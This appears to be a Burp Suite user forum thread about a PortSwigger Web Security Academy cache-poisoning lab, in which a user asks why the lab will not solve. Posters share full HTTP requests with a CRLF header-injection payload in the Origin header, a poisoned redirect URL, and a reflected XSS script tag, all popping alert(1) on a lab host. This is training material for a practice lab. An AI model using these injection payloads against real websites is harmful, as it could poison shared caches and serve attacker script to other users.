Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab Cache Poisoning - Cache key injection

Samuel | Last updated: Apr 27, 2023 04:17PM UTC

For some reason I cannot solve this lab. First, I'm sending this poison to localize.js file. I'm receiving the HIT response. GET /js/localize.js?lang=en?utm_content=z&cors=1&x=1 HTTP/2 Host: 0ad5006c0322e3088120d06e00f100d8.web-security-academy.net Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$ Cookie: session=rChKg79rjuzj7UsFPNoqw6DsOdyd8s32; lang=en; lang=en User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers Next, I'm sending GET request to /login?lang=en? GET /login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23 HTTP/2 Host: 0ad5006c0322e3088120d06e00f100d8.web-security-academy.net Cookie: session=rChKg79rjuzj7UsFPNoqw6DsOdyd8s32; lang=en; lang=en User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers For last request I'm receiving 302 Found with Location header pointing to poisoned URL. But lab doesn't change to solve. Actually, if I visit /login after the poisoning, I can see that there is a redirection to alert page.

Dominyque, PortSwigger Agent | Last updated: May 02, 2023 12:24PM UTC

Hi We have tested the lab and were able to solve it. Are you still having problems solving it? If so, please let us know. It should be noted that downgrading from HTTP/2 to HTTP/1.1 aided in solving the lab. Here is a link to a video solution and hopefully this provides some helpful guidance for you: https://www.youtube.com/watch?v=fU65sWuZPyc

Sharon | Last updated: Aug 26, 2023 11:56PM UTC

Following the YouTube video solution did not help. This is what worked: GET /?utm_content='><script>alert(1)</script> HTTP/2

Dominyque, PortSwigger Agent | Last updated: Aug 28, 2023 09:12AM UTC

Hi Sharon Thank you for sharing that helpful tip!

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.